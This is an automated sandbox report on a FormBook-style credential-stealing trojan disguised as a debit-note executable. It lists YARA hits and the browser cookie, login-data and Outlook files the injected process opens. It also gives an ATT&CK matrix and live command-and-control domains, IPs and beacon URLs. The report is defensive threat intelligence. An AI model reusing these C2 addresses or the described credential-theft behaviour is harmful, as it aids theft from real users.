Source: Yara match	File source: 00000007.00000002.4099556675.0000000005630000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2058640139.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4097236613.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4096792766.0000000003740000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2059058691.0000000004D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\xcopy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\xcopy.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2058426650.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4097004785.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4095195033.0000000000A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4099556675.0000000005630000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2058640139.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4097236613.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4096792766.0000000003740000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2059058691.0000000004D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	412 Process Injection	2 Virtualization/Sandbox Evasion	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	412 Process Injection	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Abuse Elevation Control Mechanism	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe	61%	ReversingLabs	Win32.Trojan.AutoitInject
debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe	100%	Avira	DR/AutoIt.Gen8
debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://www.gmo.jp/images/public/common/logo.gif	0%	Avira URL Cloud	safe
http://www.j252mv.site/0by3/?Q8r=efHJA933MNzr/PW0mnuDq9Bq5Tko85ea564Kp9U5FyRJkGEFhbQl4J8Qjgja2f9fM8RihmJcYOokucUKLubMlM0irYAtLesM+0DLZZlGElvWUt69+LazkvU=&6trpq=anQT3n	0%	Avira URL Cloud	safe
http://www.98yl9900.vip/vpuy/	100%	Avira URL Cloud	malware
http://www.electronify.shop/3ase/?Q8r=f11mnzhDDGBf+/artp+PfsS316rmJteNkA5Z8hOTIieoFxtTQBGeVYPutJ4Jq/YWKuaYmzuYepHFf+3fXfMgZDBF3jtHXko48sZRIiancbFNwMQpED1LC8k=&6trpq=anQT3n	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
http://www.cursosonline.bio/uq6t/	0%	Avira URL Cloud	safe
http://www.onamae.com/?banner_id=634	0%	Avira URL Cloud	safe
http://www.deepfy.xyz/0zsv/?Q8r=+k4oqFxRNocWibNOARfqv4VMC58QqhlZUZKcqPt4OXzeqjQirtEo6xCQlowbpjBKI3NLMSWGXVvwuRLD6mLhdQvHcmrKXdi5xtD9EO55lWtqmLshJCc1gWo=&6trpq=anQT3n	0%	Avira URL Cloud	safe
http://www.prediksipreman.fyi/fy4q/	0%	Avira URL Cloud	safe
http://www.mjmegartravel.online/vzdg/?Q8r=KE8APriLyHXVd58o2RVaxaHXOxKH6DBplwKhZxuWS8ol8ZNB+zrcGju15mUNFjZ4/qmrZG+pRN3cP3bWpxBJDHDy3g5/i7RwSLvxhij0g+QyzFB905H5wec=&6trpq=anQT3n	0%	Avira URL Cloud	safe
http://www.j252mv.site/0by3/	0%	Avira URL Cloud	safe
http://www.sibeta.info/4ecw/?Q8r=0dQ8CvJEcf0k7N3KGSlLirxY6r92/jsun5G8F0uxw3yzZhCR3PWiA4isvn4XsmdrPPNvoDvZx6QPnXDC61qvR3DkSSTWPVERcD9g8HOA7TMtamwzCoHCAmc=&6trpq=anQT3n	0%	Avira URL Cloud	safe
https://www.google.com	0%	Avira URL Cloud	safe
http://www.dwmdconsulting.llc/kz8j/?Q8r=QgKs8ib8pSkW+zKBwipCHX7UMUqMF7yADzXTDGJ0XdB6OCHQraJ+KZU3DxhMouRtg+08egxU0v/OLmtErrB1+9oqLfJkb4rbcOK0NiMrGSL51W8rMrC8dsw=&6trpq=anQT3n	0%	Avira URL Cloud	safe
http://www.deepfy.xyz/0zsv/	0%	Avira URL Cloud	safe
http://www.onamae-server.com/	0%	Avira URL Cloud	safe
http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer	0%	Avira URL Cloud	safe
http://www.energyparks.net/87jo/	0%	Avira URL Cloud	safe
http://www.5hdgb2p9a.buzz/lxjv/	0%	Avira URL Cloud	safe
http://www.jivatop.online	0%	Avira URL Cloud	safe
http://www.98yl9900.vip/vpuy/?Q8r=GohnPojKoDSo26eExaRPtq0fYHz1awKnkuX4rqCOwHJs0Om2tBI/qHVUK+LhjFCYnUGrzAuj4BG5Iu5ezVBqMm60AjojQL4Je3zYgtUuMeqMe2LW7C+ksjQ=&6trpq=anQT3n	100%	Avira URL Cloud	malware
http://www.prediksipreman.fyi/fy4q/?Q8r=mcLISvp6nW4sNO0Oj8jOpWhNNbX1eENX6bIi/iiCJdbobbylfQD4XX0OLgusDywc0PIJxHOPAGfsQI2vBEzMGplJEOCqrWIF9aldzRVMXORMZ/L63cm0yJs=&6trpq=anQT3n	0%	Avira URL Cloud	safe
http://www.budged.net/rwi3/?Q8r=3l9HWofhi4qI6FgwzBgfqCSqepMbi+x/tP4hcqqML+ok6ico/8tPHaiq8anAIRqTRw/AlsoC6MOKOJSN91dw5wR1aaSWnnHTBS7NSUaA1IBUrmZ191OmHzE=&6trpq=anQT3n	0%	Avira URL Cloud	safe
http://www.electronify.shop/3ase/	0%	Avira URL Cloud	safe
http://www.time-change.fyi/tc13/?Q8r=SGbT8cdGn4hr6W9IQaErgA0XZ0/ODBbeE+rRSQfNCBVGsaJUOBN6Lk8UowuO+R8+qu85kOdeeMLFTNx1Fuyr7ECi1xcpiA8ny7JQ29NqIXoz/KZuCpX8Llg=&6trpq=anQT3n	0%	Avira URL Cloud	safe
http://www.5hdgb2p9a.buzz/lxjv/?6trpq=anQT3n&Q8r=+K5n/IT0yXRRANeuqn/owCg6I74ZgbMezEFWIjAj36nDkdhnum9kwXyxiYh8DtQScaz4Dnq0yx+OkYvS6b/TqIhsF3CYh8jP4suZ5AZYY+5BPcJw3t1/wxU=	0%	Avira URL Cloud	safe
http://www.mjmegartravel.online/vzdg/	0%	Avira URL Cloud	safe
http://www.jivatop.online/kbf1/	0%	Avira URL Cloud	safe
http://www.sibeta.info/4ecw/	0%	Avira URL Cloud	safe
http://www.energyparks.net/87jo/?Q8r=ozysDd3vwv9gaS29FRbnc0GmlFkZcaQYkpXnKEUw0wCH0hn9MIemfLYf1abLLDUSAte8bdVQTpE72RtdL6FpCvjERq56vwlcganuPeakPXnenu2oXl0fStc=&6trpq=anQT3n	0%	Avira URL Cloud	safe
http://www.dwmdconsulting.llc/kz8j/	0%	Avira URL Cloud	safe
http://www.time-change.fyi/tc13/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.time-change.fyi	217.160.0.111	true	true	unknown
www.cursosonline.bio	199.59.243.227	true	true	unknown
electronify.shop	84.32.84.32	true	true	unknown
budged.net	195.154.200.15	true	true	unknown
prediksipreman.fyi	162.0.215.244	true	true	unknown
www.j252mv.site	150.95.254.16	true	true	unknown
www.5hdgb2p9a.buzz	168.76.221.252	true	true	unknown
www.jivatop.online	185.179.189.193	true	true	unknown
dwmdconsulting.llc	3.33.130.190	true	true	unknown
mjmegartravel.online	76.223.67.189	true	true	unknown
www.deepfy.xyz	199.59.243.227	true	true	unknown
www.98yl9900.vip	104.21.3.144	true	true	unknown
www.sibeta.info	162.0.231.203	true	true	unknown
energyparks.net	3.33.130.190	true	true	unknown
www.prediksipreman.fyi	unknown	unknown	false	unknown
www.budged.net	unknown	unknown	false	unknown
www.mjmegartravel.online	unknown	unknown	false	unknown
www.energyparks.net	unknown	unknown	false	unknown
www.dwmdconsulting.llc	unknown	unknown	false	unknown
www.electronify.shop	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.98yl9900.vip/vpuy/	true	Avira URL Cloud: malware	unknown
http://www.cursosonline.bio/uq6t/	true	Avira URL Cloud: safe	unknown
http://www.deepfy.xyz/0zsv/?Q8r=+k4oqFxRNocWibNOARfqv4VMC58QqhlZUZKcqPt4OXzeqjQirtEo6xCQlowbpjBKI3NLMSWGXVvwuRLD6mLhdQvHcmrKXdi5xtD9EO55lWtqmLshJCc1gWo=&6trpq=anQT3n	true	Avira URL Cloud: safe	unknown
http://www.electronify.shop/3ase/?Q8r=f11mnzhDDGBf+/artp+PfsS316rmJteNkA5Z8hOTIieoFxtTQBGeVYPutJ4Jq/YWKuaYmzuYepHFf+3fXfMgZDBF3jtHXko48sZRIiancbFNwMQpED1LC8k=&6trpq=anQT3n	true	Avira URL Cloud: safe	unknown
http://www.mjmegartravel.online/vzdg/?Q8r=KE8APriLyHXVd58o2RVaxaHXOxKH6DBplwKhZxuWS8ol8ZNB+zrcGju15mUNFjZ4/qmrZG+pRN3cP3bWpxBJDHDy3g5/i7RwSLvxhij0g+QyzFB905H5wec=&6trpq=anQT3n	true	Avira URL Cloud: safe	unknown
http://www.j252mv.site/0by3/?Q8r=efHJA933MNzr/PW0mnuDq9Bq5Tko85ea564Kp9U5FyRJkGEFhbQl4J8Qjgja2f9fM8RihmJcYOokucUKLubMlM0irYAtLesM+0DLZZlGElvWUt69+LazkvU=&6trpq=anQT3n	true	Avira URL Cloud: safe	unknown
http://www.prediksipreman.fyi/fy4q/	true	Avira URL Cloud: safe	unknown
http://www.deepfy.xyz/0zsv/	true	Avira URL Cloud: safe	unknown
http://www.j252mv.site/0by3/	true	Avira URL Cloud: safe	unknown
http://www.sibeta.info/4ecw/?Q8r=0dQ8CvJEcf0k7N3KGSlLirxY6r92/jsun5G8F0uxw3yzZhCR3PWiA4isvn4XsmdrPPNvoDvZx6QPnXDC61qvR3DkSSTWPVERcD9g8HOA7TMtamwzCoHCAmc=&6trpq=anQT3n	true	Avira URL Cloud: safe	unknown
http://www.dwmdconsulting.llc/kz8j/?Q8r=QgKs8ib8pSkW+zKBwipCHX7UMUqMF7yADzXTDGJ0XdB6OCHQraJ+KZU3DxhMouRtg+08egxU0v/OLmtErrB1+9oqLfJkb4rbcOK0NiMrGSL51W8rMrC8dsw=&6trpq=anQT3n	true	Avira URL Cloud: safe	unknown
http://www.5hdgb2p9a.buzz/lxjv/	true	Avira URL Cloud: safe	unknown
http://www.energyparks.net/87jo/	true	Avira URL Cloud: safe	unknown
http://www.prediksipreman.fyi/fy4q/?Q8r=mcLISvp6nW4sNO0Oj8jOpWhNNbX1eENX6bIi/iiCJdbobbylfQD4XX0OLgusDywc0PIJxHOPAGfsQI2vBEzMGplJEOCqrWIF9aldzRVMXORMZ/L63cm0yJs=&6trpq=anQT3n	true	Avira URL Cloud: safe	unknown
http://www.98yl9900.vip/vpuy/?Q8r=GohnPojKoDSo26eExaRPtq0fYHz1awKnkuX4rqCOwHJs0Om2tBI/qHVUK+LhjFCYnUGrzAuj4BG5Iu5ezVBqMm60AjojQL4Je3zYgtUuMeqMe2LW7C+ksjQ=&6trpq=anQT3n	true	Avira URL Cloud: malware	unknown
http://www.5hdgb2p9a.buzz/lxjv/?6trpq=anQT3n&Q8r=+K5n/IT0yXRRANeuqn/owCg6I74ZgbMezEFWIjAj36nDkdhnum9kwXyxiYh8DtQScaz4Dnq0yx+OkYvS6b/TqIhsF3CYh8jP4suZ5AZYY+5BPcJw3t1/wxU=	true	Avira URL Cloud: safe	unknown
http://www.budged.net/rwi3/?Q8r=3l9HWofhi4qI6FgwzBgfqCSqepMbi+x/tP4hcqqML+ok6ico/8tPHaiq8anAIRqTRw/AlsoC6MOKOJSN91dw5wR1aaSWnnHTBS7NSUaA1IBUrmZ191OmHzE=&6trpq=anQT3n	true	Avira URL Cloud: safe	unknown
http://www.electronify.shop/3ase/	true	Avira URL Cloud: safe	unknown
http://www.jivatop.online/kbf1/	true	Avira URL Cloud: safe	unknown
http://www.time-change.fyi/tc13/?Q8r=SGbT8cdGn4hr6W9IQaErgA0XZ0/ODBbeE+rRSQfNCBVGsaJUOBN6Lk8UowuO+R8+qu85kOdeeMLFTNx1Fuyr7ECi1xcpiA8ny7JQ29NqIXoz/KZuCpX8Llg=&6trpq=anQT3n	true	Avira URL Cloud: safe	unknown
http://www.mjmegartravel.online/vzdg/	true	Avira URL Cloud: safe	unknown
http://www.sibeta.info/4ecw/	true	Avira URL Cloud: safe	unknown
http://www.energyparks.net/87jo/?Q8r=ozysDd3vwv9gaS29FRbnc0GmlFkZcaQYkpXnKEUw0wCH0hn9MIemfLYf1abLLDUSAte8bdVQTpE72RtdL6FpCvjERq56vwlcganuPeakPXnenu2oXl0fStc=&6trpq=anQT3n	true	Avira URL Cloud: safe	unknown
http://www.dwmdconsulting.llc/kz8j/	true	Avira URL Cloud: safe	unknown
http://www.time-change.fyi/tc13/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	xcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.onamae.com/?banner_id=634	xcopy.exe, 00000006.00000002.4098892628.0000000004C04000.00000004.10000000.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000002.4097443075.0000000004274000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	xcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	xcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gmo.jp/images/public/common/logo.gif	xcopy.exe, 00000006.00000002.4098892628.0000000004C04000.00000004.10000000.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000002.4097443075.0000000004274000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	xcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	xcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	xcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	xcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com	xcopy.exe, 00000006.00000002.4098892628.0000000004F28000.00000004.10000000.00040000.00000000.sdmp, xcopy.exe, 00000006.00000002.4098892628.0000000004106000.00000004.10000000.00040000.00000000.sdmp, xcopy.exe, 00000006.00000002.4100845977.0000000006540000.00000004.00000800.00020000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000002.4097443075.0000000003776000.00000004.00000001.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000002.4097443075.0000000004598000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.onamae-server.com/	xcopy.exe, 00000006.00000002.4098892628.0000000004C04000.00000004.10000000.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000002.4097443075.0000000004274000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer	xcopy.exe, 00000006.00000002.4098892628.0000000004298000.00000004.10000000.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000002.4097443075.0000000003908000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jivatop.online	PMZSowQBcVJqD.exe, 00000007.00000002.4099556675.0000000005694000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	xcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	xcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
162.0.215.244	prediksipreman.fyi	Canada	35893	ACPCA	true
217.160.0.111	www.time-change.fyi	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
162.0.231.203	www.sibeta.info	Canada	22612	NAMECHEAP-NETUS	true
168.76.221.252	www.5hdgb2p9a.buzz	South Africa	265240	ULTRANETSERVICOSEMINTERNETLTDABR	true
76.223.67.189	mjmegartravel.online	United States	16509	AMAZON-02US	true
199.59.243.227	www.cursosonline.bio	United States	395082	BODIS-NJUS	true
104.21.3.144	www.98yl9900.vip	United States	13335	CLOUDFLARENETUS	true
84.32.84.32	electronify.shop	Lithuania	33922	NTT-LT-ASLT	true
150.95.254.16	www.j252mv.site	Japan	7506	INTERQGMOInternetIncJP	true
195.154.200.15	budged.net	France	12876	OnlineSASFR	true
3.33.130.190	dwmdconsulting.llc	United States	8987	AMAZONEXPANSIONGB	true
185.179.189.193	www.jivatop.online	Russian Federation	44094	WEBHOST1-ASRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1548308
Start date and time:	2024-11-04 10:09:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe renamed because original name is a hash value
Original Sample Name:	debitnote607-36099895.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/2@14/12
EGA Information:	Successful, ratio: 80%
HCA Information:	Successful, ratio: 88% Number of executed functions: 35 Number of non-executed functions: 319
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
VT rate limit hit for: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe

Simulations

Behavior and APIs

Time	Type	Description
04:11:13	API Interceptor	9571791x Sleep call for process: xcopy.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
162.0.215.244	NF_Payment_Ref_FAN930276.exe	Get hash	malicious	FormBook	Browse	www.prediksipreman.fyi/3lre/
	18in SPA-198-2024.exe	Get hash	malicious	FormBook	Browse	www.prediksipreman.fyi/3lre/
	PO1268931024 - Bank Slip.exe	Get hash	malicious	PureLog Stealer	Browse	www.prediksipreman.fyi/3lre/
	http://mirchmasala2go.com	Get hash	malicious	Unknown	Browse	mirchmasala2go.com/
217.160.0.111	NNj87.exe	Get hash	malicious	FormBook	Browse	www.carliente.com/ve3w/
	NJjU88.exe	Get hash	malicious	FormBook	Browse	www.carliente.com/ve3w/
	BHYIOPIj.exe	Get hash	malicious	FormBook	Browse	www.carliente.com/ve3w/
	eNXDCIvEXI.exe	Get hash	malicious	FormBook	Browse	www.carliente.com/mcz6/
	H25iQbxCki.exe	Get hash	malicious	FormBook	Browse	www.carliente.com/mcz6/
	Request for Quotation # 3200025006.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.carliente.com/ntpp/
	Request for Quotation # 3200025006.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.carliente.com/ntpp/
	Factura (3).exe	Get hash	malicious	FormBook	Browse	www.carliente.com/mcz6/
	JUSTIFICANTE DE PAGO 18903547820000.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.carliente.com/ntpp/
	STATEMENT OF ACCOUNT.exe	Get hash	malicious	FormBook	Browse	www.carliente.com/3g97/?iJdtI=UBp4nvRH&-b=pss1I4hPKcXAgTePnemGc7FXasx9qfjLrlXUMEqkxJwN3Lu9fPUDc8IPlpsJO9uNl7TAjBTqm2QSFPkGLslIPQEm/bcAIhxallCZA6vttiGmo3Ak8A==

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.5hdgb2p9a.buzz	A4mmSHCUi2.exe	Get hash	malicious	FormBook	Browse	168.76.221.252

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ONEANDONE-ASBrauerstrasse48DE	kWcgTHdqyB.exe	Get hash	malicious	Stealc, Vidar	Browse	87.106.236.48
	ARw1Gy3UsZ.exe	Get hash	malicious	Stealc, Vidar	Browse	87.106.236.48
	Payload 94.75 (4).225.exe	Get hash	malicious	Kronos, Strela Stealer	Browse	94.143.137.213
	Payload 94.75 (3).225.exe	Get hash	malicious	Unknown	Browse	82.165.70.65
	vTvt7ezxnl.exe	Get hash	malicious	Stealc, Vidar	Browse	87.106.236.48
	LpzvKHFnGD.exe	Get hash	malicious	Stealc, Vidar	Browse	87.106.236.48
	Reservation Detail Booking.com ID4336.vbs	Get hash	malicious	AsyncRAT, PureLog Stealer, zgRAT	Browse	212.227.67.33
	https://myabd.co.uk/main/arull.php?7080797967704b53693230746450544d6f737a6b6a4e533076544b7972566438774a38394d4841413d3d#EMAILBASE64#	Get hash	malicious	HTMLPhisher	Browse	217.160.0.3
	https://www.google.se/url?q=%25CHAR5fgdrehsuabfolb&rct=%25CHAR4ndgsTYhfgyrv452jbsda&sa=t&esrc=Rgxldhffsbxhds&source=&cd=ZyB0byB5b3Ugbm=BAowunbc&ved=NmsnjdowpteqndyCBtY=&url=amp/reformasvaesma.es/pujrtqdguyr?eyCBtYgRFnRgxLmVnPv	Get hash	malicious	Unknown	Browse	82.223.67.146
	xLgTQcFdIJ.exe	Get hash	malicious	Stealc, Vidar	Browse	87.106.236.48
NAMECHEAP-NETUS	QNBSWIFT.exe	Get hash	malicious	FormBook	Browse	162.0.238.246
	URGENT REQUEST FOR QUOTATION.exe	Get hash	malicious	FormBook	Browse	199.192.21.169
	New Order list attached.exe	Get hash	malicious	DBatLoader, FormBook	Browse	162.0.225.218
	6724f91d7b548.vbs	Get hash	malicious	Unknown	Browse	198.54.116.219
	#U2749processo#U2749_#U2464#U2461#U2467#U2465#U2462#U2463#U2467#U2461.hta	Get hash	malicious	Unknown	Browse	198.54.116.219
	6724c67fe2634.vbs	Get hash	malicious	Unknown	Browse	192.64.117.206
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	199.188.200.195
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	199.188.200.195
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	199.188.200.195
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	199.188.200.195
ACPCA	QNBSWIFT.exe	Get hash	malicious	FormBook	Browse	162.0.209.213
	IMPORT PERMITS.exe	Get hash	malicious	FormBook	Browse	162.0.211.143
	A4mmSHCUi2.exe	Get hash	malicious	FormBook	Browse	162.0.211.143
	draft contract for order #782334.exe	Get hash	malicious	FormBook	Browse	162.0.211.143
	NF_Payment_Ref_FAN930276.exe	Get hash	malicious	FormBook	Browse	162.0.215.244
	Contrato.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	FACTURA - FOB-78787-5677__________________pif.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.28177.5145.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	18in SPA-198-2024.exe	Get hash	malicious	FormBook	Browse	162.0.215.244
